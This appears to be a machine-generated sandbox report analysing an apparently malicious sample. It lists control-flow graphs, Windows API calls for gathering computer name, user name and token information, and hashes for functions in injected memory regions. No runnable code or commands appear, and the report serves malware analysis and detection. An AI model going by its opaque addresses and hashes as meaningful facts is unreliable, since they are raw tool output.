                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 293 6852a0-6852a5 294 6852ab-6852f5 293->294 295 68532e-68533f 293->295 294->295 298 6852f7 294->298 299 68536b-685390 295->299 300 6853fe 298->300 308 685392-68539a 299->308 309 6853c3 299->309 301 6c0d4c-6c0d4e 300->301 302 685404-68540e 300->302 304 685424 302->304 306 68542a 304->306 307 68539b 304->307 306->307 310 685430-685443 306->310 311 68539d-6853a1 307->311 312 685413-685419 307->312 308->307 313 6852b0-6852b5 311->313 314 6853a7 311->314 314->313 315 6853ad 314->315 316 6853af-6853f1 315->316 317 6853f3-6853f9 315->317 316->312 316->317 317->300 320 685322-685328 317->320 321 68532a 320->321 322 685355 320->322 321->322 324 68532c 321->324 325 6852e8-685363 322->325 326 6852d1-6852e7 322->326 324->295 329 6853d1-6853d5 325->329 330 685365 325->330 326->325 329->311 331 6853d7 329->331 330->329 332 685367-685369 330->332 334 68534b 331->334 335 685400-68540e 331->335 332->299 334->335 336 685351-685353 334->336 335->304 336->322
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemDefaultLangID.KERNELBASE ref: 006853C4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001A.00000002.2621234035.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_26_2_680000_snmptrap.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DefaultLangSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 706401283-0
                                                                                                                                                                      • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction ID: 320e0fdfc968efa23e5be2b3f6b80565402518b64dff1efe15403fcea4b02cd8
                                                                                                                                                                      • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction Fuzzy Hash: 8D41E95140DE958FD726732444643F07BD39B123E2F9D07D7D4878B2E2F6984C829766
                                                                                                                                                                      Function 006A0080 Relevance: 5.0, APIs: 3, Instructions: 466COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 6a0080-6a0286 2 6a0099-6a0575 0->2 3 6a028c 0->3 7 6a057b 2->7 8 6a0155 2->8 5 6a0445 3->5 5->2 6 6a044b-6a0457 5->6 9 6a0458-6a0472 GetComputerNameW 6->9 7->8 10 6a0581-6a0587 7->10 11 6a02ef-6a0495 call 68e050 * 2 8->11 15 6a03ee-6a03f4 9->15 16 6a024c-6a0253 9->16 13 6a058b 10->13 11->9 52 6a043e 11->52 18 6a058c-6a0591 13->18 19 6a0181 VirtualFree 13->19 38 6a00da-6a023f 15->38 39 6a03fa 15->39 23 6a01e6 16->23 24 6a0255 16->24 21 6a04ab-6a04af 18->21 22 6a0597 18->22 20 6a01a8-6a02ac call 6b7164 19->20 28 6a02b1-6a02be 20->28 49 6a04c7 21->49 22->21 30 6a059d 22->30 27 6a01ec-6a0313 call 6b715c 23->27 23->28 31 6a02d3 24->31 55 6a0318-6a031e 27->55 34 6a03bf-6a03d9 GetUserNameW 28->34 35 6a02c4 28->35 30->21 31->23 37 6a02d9 31->37 44 6a0331 34->44 35->34 45 6a02ca 35->45 37->11 38->16 53 6a0241-6a024a 38->53 39->38 46 6a0400 39->46 50 6a0171 44->50 51 6a0337 44->51 45->31 54 6ab1ee-6ab49f 46->54 61 6a04cc-6a04e6 call 6b9970 GetComputerNameW 49->61 56 6a013f-6a0146 50->56 57 6a0173 50->57 51->50 58 6a033d 51->58 52->5 53->16 53->28 59 6a0568-6a056b 55->59 60 6a0324 55->60 56->13 62 6a0230 57->62 63 6a05d0-6a05d9 58->63 59->61 60->59 65 6a032a 60->65 69 6a04ec-6a0514 61->69 70 6a0131 61->70 62->49 67 6a0236-6a05c2 62->67 63->54 65->44 67->49 74 6a05c8-6a05c9 67->74 69->59 72 6a0089-6a008c 70->72 73 6a0137 70->73 72->20 76 6a0092 72->76 73->72 77 6a013d 73->77 74->63 76->20 78 6a0098 76->78 77->19 77->56 78->2
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001A.00000002.2621234035.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_26_2_680000_snmptrap.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ComputerName
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3545744682-0
                                                                                                                                                                      • Opcode ID: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
                                                                                                                                                                      • Instruction ID: 38bb56dd8485a74b2a25a2004df6af95478c3628df74100b2d2887c7261a8c9e
                                                                                                                                                                      • Opcode Fuzzy Hash: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
                                                                                                                                                                      • Instruction Fuzzy Hash: 34D12531418F098BEB28FF58C8457EAB3D2FBA6310F18461ED846C3265DA749E458FC2
                                                                                                                                                                      Function 00688070 Relevance: 4.7, APIs: 3, Instructions: 236COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 79 688070-68817e 81 68813d-6881a5 79->81 82 688180 79->82 88 6881bd-6881ca 81->88 89 6881a7 81->89 82->81 85 688161 82->85 87 688163-688170 call 6b7164 85->87 93 688172 87->93 94 688186 CloseHandle 87->94 96 6881d0 88->96 97 6880f3 88->97 95 68818c-688192 93->95 94->95 99 688194 95->99 100 688115-688118 95->100 110 6881fe-688201 GetTokenInformation 96->110 111 6880c3 96->111 101 68808c 97->101 102 6880f5 97->102 99->100 105 68819a 99->105 103 688119-68811a 100->103 104 6880a7 100->104 106 68808e-688184 101->106 102->101 112 688077 102->112 103->104 109 68811c 103->109 105->81 106->94 106->95 115 68820f 109->115 110->115 125 6881b7 110->125 111->110 116 6880c9 111->116 117 6881d7-6881de call 6b715c 112->117 115->106 122 688215-68821e 115->122 120 6880ca-6880d8 GetTokenInformation 116->120 123 6881e3-6881e6 117->123 124 68810f 120->124 122->106 135 688224 122->135 123->120 137 688089 123->137 128 68812d 124->128 129 688111 124->129 125->115 127 6881b9-6881bb 125->127 127->88 132 6880a8 128->132 133 688133-6881f0 128->133 129->128 134 688113 129->134 138 6880aa-6880ad 132->138 141 6880da-6880f1 133->141 142 6881f6 133->142 134->100 135->117 139 688226 135->139 137->120 143 68808b 137->143 138->87 144 6880b3-688203 138->144 139->117 140 688228-6882ee call 685d90 139->140 154 68830c-688320 call 685d90 call 68ec00 140->154 155 6882f0 140->155 141->138 142->141 147 6881fc 142->147 143->101 144->87 149 688209 144->149 147->110 158 6882f7-6882fc call 685d90 154->158 170 688322 154->170 155->154 156 6882f2 155->156 156->158 165 688302 158->165 166 688253-688265 call 6a1280 158->166 165->166 169 688308-68830a 165->169 173 688328 166->173 174 68826b 166->174 169->154 170->158 172 688324-688326 170->172 172->173 178 6882df-68832b 173->178 179 688335 173->179 174->173 177 68823f-688243 174->177 177->158 178->179 182 68832d-688331 178->182 183 68829b-68829d 179->183 184 688287 179->184 182->179 184->183 186 68824e-688252 184->186 186->166
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001A.00000002.2621234035.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_26_2_680000_snmptrap.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
                                                                                                                                                                      • Instruction ID: 030a5516834299ee81e592e426dae8791d000cd9c435e54719a104eec0e8819c
                                                                                                                                                                      • Opcode Fuzzy Hash: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
                                                                                                                                                                      • Instruction Fuzzy Hash: BE61373050CA469FC7A5BB2888283B57BA3FB55350FD8075AD487C33A1DF249D46D792
                                                                                                                                                                      Function 00685910 Relevance: 1.9, APIs: 1, Instructions: 607COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 187 685910-685968 189 68596a 187->189 190 685915-685928 call 6b9970 187->190 189->190 194 685931-69072c 189->194 195 6859b8 call 6a0df0 190->195 198 690732-690738 194->198 199 690806-690809 194->199 200 6859bd-6859c2 call 685d90 195->200 202 69073e 198->202 203 690800 198->203 206 69079d-6907a6 199->206 208 6859c7-6859ce 200->208 202->203 207 690744-690774 202->207 203->199 204 6906b3-6906b7 203->204 204->206 210 6906bd 204->210 211 6907a8 206->211 212 690791-690793 206->212 215 69077a-69081c 207->215 216 6906d5-6906d9 207->216 213 685a1a-685a26 call 685e10 208->213 214 6859d0 208->214 210->206 217 6906c3-6907fe 210->217 211->212 219 6907aa 211->219 218 6907ca-6907cc 212->218 213->195 234 685a08-685a0b 213->234 214->213 221 6859d2-6859d8 214->221 215->206 224 6906db 216->224 225 6906df 216->225 217->203 219->218 237 6859d9-6859de call 6b2190 221->237 224->225 226 6906dd 224->226 225->206 226->225 229 69c0cc 226->229 232 69c0e8-69c102 229->232 233 69c0ce-69c0d0 229->233 238 69c0d2-69c0df 232->238 239 69c104 232->239 233->238 235 685a0d 234->235 236 685994-68599c 234->236 247 685991 235->247 248 685932 235->248 242 68599e-6859f7 236->242 243 685a02 236->243 237->236 254 6859e0 237->254 250 69c0e7 238->250 239->238 239->250 242->243 252 68597d 243->252 253 6859d4-685a15 call 6a11a0 243->253 247->248 255 685993 247->255 256 6859e4-6859ec call 6b21ac 248->256 252->253 258 68597f-685981 252->258 254->236 259 6859e2 254->259 255->236 265 6859ed 256->265 266 685a62-685a6e 256->266 261 685983-685a38 258->261 259->256 261->236 268 685a3e 261->268 265->261 271 6859ee-6859ef 265->271 269 685a70 266->269 270 685a75-685ab3 call 6a1280 266->270 268->237 269->270 274 685a72 269->274 280 685abb-685ac9 270->280 281 685ab5 270->281 271->261 276 6859f1 271->276 274->270 276->190 283 685af2-685af5 280->283 281->280 282 685ab7-685ab9 281->282 282->280 287 685adb-685adc 283->287 288 685ad5 283->288 290 685ae2 287->290 291 685a45-685a46 287->291 288->287 289 685ad7-685ad9 288->289 289->287 290->291 292 685ae8 290->292 292->283
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001A.00000002.2621234035.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_26_2_680000_snmptrap.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction ID: 56bdeba851ba3a21138203637d9d4f9af3ef930e716e3422f7c2fadb824d2547
                                                                                                                                                                      • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction Fuzzy Hash: 5BF1182171CE488FCBA9B71C58513F977D3EB9A320F68429EE04BC7396DD249C068796
                                                                                                                                                                      Function 00685B42 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 337 685b42-685b47 call 685d90 339 685b4c-685b52 337->339 341 685b0d 339->341 342 685c42-685c62 call 6a1280 339->342 341->342 343 685b13 341->343 357 685c14-685cc0 342->357 358 685c26 342->358 345 685c8f-685c96 343->345 347 685c98-685c9a 345->347 348 685c29 345->348 349 685c9c 347->349 350 685c2f-685c36 348->350 351 685cc2-685cc9 call 6852a0 348->351 360 685bfa 349->360 361 685d0e-685d18 349->361 350->351 354 685c3c 350->354 366 685c69 351->366 367 685ccb 351->367 354->337 357->351 358->357 365 685c28 358->365 360->361 368 685c00 360->368 362 685d1a 361->362 363 685d54 361->363 371 685d4b-685d52 362->371 365->348 369 685b68-685d75 366->369 370 685c6f 366->370 367->349 372 685ccd 367->372 368->357 370->369 373 685c75 370->373 371->363 374 685d45-685d47 371->374 372->349 375 685ccf-685ce4 CreateThread 372->375 373->345 377 685d49 374->377 378 685d5f 374->378 380 685cea 375->380 381 685c01-685c05 375->381 377->371 377->378 383 685d65 378->383 380->381 384 685cf0-685cf6 380->384 385 685c20-685c68 381->385 388 685d37-685d41 381->388 383->383 384->385 388->371 389 685d43 388->389 389->363
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001A.00000002.2621234035.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_26_2_680000_snmptrap.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction ID: 1fd5878486fb9e6e91deb5e64a1163d8b2e14381cbe0aa5dc5c64701a2606556
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction Fuzzy Hash: 0A21923020CF45CFDBA9BB1884687F466D3EB65350F6803AE9447CF392DA24CC459B5A
                                                                                                                                                                      Function 00685B09 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 390 685b09-685d01 395 685bb4-685ce4 CreateThread 390->395 396 685d07 390->396 403 685cea 395->403 404 685c01-685c05 395->404 396->395 397 685d0d 396->397 399 685d37-685d41 397->399 401 685d4b-685d52 399->401 402 685d43 399->402 405 685d54 401->405 406 685d45-685d47 401->406 402->405 403->404 408 685cf0-685cf6 403->408 404->399 409 685c20-685c68 404->409 410 685d49 406->410 411 685d5f 406->411 408->409 410->401 410->411 414 685d65 411->414 414->414
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001A.00000002.2621234035.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_26_2_680000_snmptrap.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction ID: 4ca7e012354006eaf5cc8e6825add173e596265f5c419788c4e848a7ad3c712c
                                                                                                                                                                      • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction Fuzzy Hash: CA01927010DF468FDB6577248C683B97793EF64324F6503AFC887CA192EAA44906AB16
                                                                                                                                                                      Function 00685B87 Relevance: 1.5, APIs: 1, Instructions: 23threadCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 415 685b87-685b99 CreateThread 416 685b1c-685b3b 415->416 417 685cff-685d01 415->417 416->417 418 685bb4-685ce4 CreateThread 417->418 419 685d07 417->419 427 685cea 418->427 428 685c01-685c05 418->428 419->418 420 685d0d 419->420 423 685d37-685d41 420->423 425 685d4b-685d52 423->425 426 685d43 423->426 429 685d54 425->429 430 685d45-685d47 425->430 426->429 427->428 432 685cf0-685cf6 427->432 428->423 433 685c20-685c68 428->433 434 685d49 430->434 435 685d5f 430->435 432->433 434->425 434->435 438 685d65 435->438 438->438
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001A.00000002.2621234035.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_26_2_680000_snmptrap.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                      • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction ID: 9016caab2514c1d3bcfc741047c355c523a8f89f00dfd73d6e48d6ff8ec712b5
                                                                                                                                                                      • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction Fuzzy Hash: 76E0863060DF444FDB59BB24586032D3AE6EB98320F1503CEC44BD72D1CB690D064787
                                                                                                                                                                      Function 0068599B Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 439 68599b-68599e 440 6859b8 call 6a0df0 439->440 441 6859f7 439->441 444 6859bd-6859c2 call 685d90 440->444 443 685a02 441->443 446 68597d 443->446 447 6859d4-685a15 call 6a11a0 443->447 451 6859c7-6859ce 444->451 446->447 450 68597f-685981 446->450 452 685983-685a38 450->452 453 685a1a-685a26 call 685e10 451->453 454 6859d0 451->454 460 685a3e 452->460 461 685994-68599c 452->461 453->440 469 685a08-685a0b 453->469 454->453 458 6859d2-6859d8 454->458 468 6859d9-6859de call 6b2190 458->468 460->468 461->443 465 68599e 461->465 465->441 468->461 476 6859e0 468->476 469->461 470 685a0d 469->470 474 685991 470->474 475 685932 470->475 474->475 477 685993 474->477 479 6859e4-6859ec call 6b21ac 475->479 476->461 478 6859e2 476->478 477->461 478->479 482 6859ed 479->482 483 685a62-685a6e 479->483 482->452 486 6859ee-6859ef 482->486 484 685a70 483->484 485 685a75-685ab3 call 6a1280 483->485 484->485 487 685a72 484->487 496 685abb-685ac9 485->496 497 685ab5 485->497 486->452 489 6859f1 call 6b9970 486->489 487->485 489->440 499 685af2-685af5 496->499 497->496 498 685ab7-685ab9 497->498 498->496 503 685adb-685adc 499->503 504 685ad5 499->504 506 685ae2 503->506 507 685a45-685a46 503->507 504->503 505 685ad7-685ad9 504->505 505->503 506->507 508 685ae8 506->508 508->499
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001A.00000002.2621234035.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_26_2_680000_snmptrap.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1284135714-0
                                                                                                                                                                      • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction ID: 7c789c739746c60fbe87f02a8b8f0c21a0b08524e0ea97ee06115b368d439fd1
                                                                                                                                                                      • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction Fuzzy Hash: 0E01D66491DEC0CFDE9BBB1844912F96593BB58320F28479AD04BCB292C9244D029746
                                                                                                                                                                      Function 00688090 Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 509 688090-688096 510 68813c-6881a5 509->510 511 688184 509->511 524 6881bd-6881ca 510->524 525 6881a7 510->525 512 68818c-688192 511->512 513 688186 CloseHandle 511->513 515 688194 512->515 516 688115-688118 512->516 513->512 515->516 519 68819a 515->519 517 688119-68811a 516->517 518 6880a7 516->518 517->518 521 68811c 517->521 519->510 523 68820f 521->523 526 68808e-688096 523->526 527 688215-68821e 523->527 530 6881d0 524->530 531 6880f3 524->531 526->511 527->526 535 688224 527->535 541 6881fe-688201 GetTokenInformation 530->541 542 6880c3 530->542 533 68808c 531->533 534 6880f5 531->534 533->526 534->533 544 688077 534->544 538 688226 535->538 539 6881d7-6881e6 call 6b715c 535->539 538->539 540 688228-6882ee call 685d90 538->540 549 6880ca-68810f GetTokenInformation 539->549 558 688089 539->558 564 68830c-688320 call 685d90 call 68ec00 540->564 565 6882f0 540->565 541->523 556 6881b7 541->556 542->541 546 6880c9 542->546 544->539 546->549 560 68812d 549->560 561 688111 549->561 556->523 559 6881b9-6881bb 556->559 558->549 566 68808b 558->566 559->524 562 6880a8 560->562 563 688133-6881f0 560->563 561->560 567 688113 561->567 570 6880aa-6880ad 562->570 572 6880da-6880f1 563->572 573 6881f6 563->573 574 6882f7-6882fc call 685d90 564->574 596 688322 564->596 565->564 569 6882f2 565->569 566->533 567->516 569->574 576 688163-688170 call 6b7164 570->576 577 6880b3-688203 570->577 572->570 573->572 579 6881fc 573->579 589 688302 574->589 590 688253-688265 call 6a1280 574->590 576->513 591 688172 576->591 577->576 585 688209 577->585 579->541 589->590 595 688308-68830a 589->595 599 688328 590->599 600 68826b 590->600 591->512 595->564 596->574 598 688324-688326 596->598 598->599 604 6882df-68832b 599->604 605 688335 599->605 600->599 603 68823f-688243 600->603 603->574 604->605 608 68832d-688331 604->608 609 68829b-68829d 605->609 610 688287 605->610 608->605 610->609 612 68824e-688252 610->612 612->590
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001A.00000002.2621234035.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_26_2_680000_snmptrap.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction ID: 6c84b53fbf283f7c39d21abd32c31861c16ad3fe1f97e0200abec32e2e2b4aa9
                                                                                                                                                                      • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction Fuzzy Hash: 94C08C641A88039E527836480C0F0F42A428712350BCC06068CC2C3324DD088E030397
                                                                                                                                                                      Function 0068817F Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 613 68817f 614 688184 613->614 615 68818c-688192 614->615 616 688186 CloseHandle 614->616 617 688194 615->617 618 688115-688118 615->618 616->615 617->618 621 68819a-6881a5 617->621 619 688119-68811a 618->619 620 6880a7 618->620 619->620 622 68811c 619->622 631 6881bd-6881ca 621->631 632 6881a7 621->632 624 68820f 622->624 626 68808e-688096 624->626 627 688215-68821e 624->627 626->614 627->626 633 688224 627->633 641 6881d0 631->641 642 6880f3 631->642 634 688226 633->634 635 6881d7-6881e6 call 6b715c 633->635 634->635 636 688228-6882ee call 685d90 634->636 656 688089 635->656 657 6880ca-68810f GetTokenInformation 635->657 661 68830c-688320 call 685d90 call 68ec00 636->661 662 6882f0 636->662 652 6881fe-688201 GetTokenInformation 641->652 653 6880c3 641->653 645 68808c 642->645 646 6880f5 642->646 645->626 646->645 654 688077 646->654 652->624 672 6881b7 652->672 653->652 658 6880c9 653->658 654->635 656->657 663 68808b 656->663 666 68812d 657->666 667 688111 657->667 658->657 671 6882f7-6882fc call 685d90 661->671 698 688322 661->698 662->661 665 6882f2 662->665 663->645 665->671 669 6880a8 666->669 670 688133-6881f0 666->670 667->666 673 688113 667->673 678 6880aa-6880ad 669->678 681 6880da-6880f1 670->681 682 6881f6 670->682 689 688302 671->689 690 688253-688265 call 6a1280 671->690 672->624 677 6881b9-6881bb 672->677 673->618 677->631 684 688163-688170 call 6b7164 678->684 685 6880b3-688203 678->685 681->678 682->681 688 6881fc 682->688 684->616 700 688172 684->700 685->684 695 688209 685->695 688->652 689->690 696 688308-68830a 689->696 703 688328 690->703 704 68826b 690->704 696->661 698->671 701 688324-688326 698->701 700->615 701->703 708 6882df-68832b 703->708 709 688335 703->709 704->703 707 68823f-688243 704->707 707->671 708->709 712 68832d-688331 708->712 713 68829b-68829d 709->713 714 688287 709->714 712->709 714->713 716 68824e-688252 714->716 716->690
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001A.00000002.2621234035.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_26_2_680000_snmptrap.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction ID: 23297f8138182d695c908156df56553f15caa64d223fc8a144344585e912866a
                                                                                                                                                                      • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction Fuzzy Hash: FCC092A859850B8F51783A882C0E0F639924B23760F8C5B13EC868B368DD584D4343A2

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 005252A0 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 291 5252a0-5253fe 296 525404-52540e 291->296 297 560d4c-560d4e 291->297 298 525424 296->298 299 52542a 298->299 300 52539b 298->300 299->300 303 525430-525443 299->303 301 525413-525419 300->301 302 52539d-5253a1 300->302 304 5252b0-5252b5 302->304 305 5253a7 302->305 305->304 306 5253ad 305->306 307 5253f3-5253f9 306->307 308 5253af 306->308 312 525355 307->312 313 52532a 307->313 309 5253e0-5253f1 308->309 309->301 309->307 317 5252d1-5252e7 312->317 318 5252e8-525363 312->318 313->312 314 52532c-52533f 313->314 316 52536b-525390 314->316 326 525392-52539a 316->326 327 5253c3 316->327 317->318 323 5253d1-5253d5 318->323 324 525365 318->324 323->302 325 5253d7 323->325 324->323 328 525367-525369 324->328 325->309 329 525342-525345 325->329 326->302 328->316 330 525400-52540e 329->330 331 52534b 329->331 330->298 331->330 332 525351-525353 331->332 332->312
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemDefaultLangID.KERNELBASE ref: 005253C4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001B.00000002.2615183440.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_27_2_520000_Spectrum.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DefaultLangSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 706401283-0
                                                                                                                                                                      • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction ID: fff7476c3727668997f0e9f14ca2ab18c86821a0c6a8338a31622065cb3f611d
                                                                                                                                                                      • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction Fuzzy Hash: 8441D75641DEB58FDB2A9A2474643707F90BF333E2F9D1CD6D482860E2F1B84C419366
                                                                                                                                                                      Function 00540080 Relevance: 5.0, APIs: 3, Instructions: 466COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

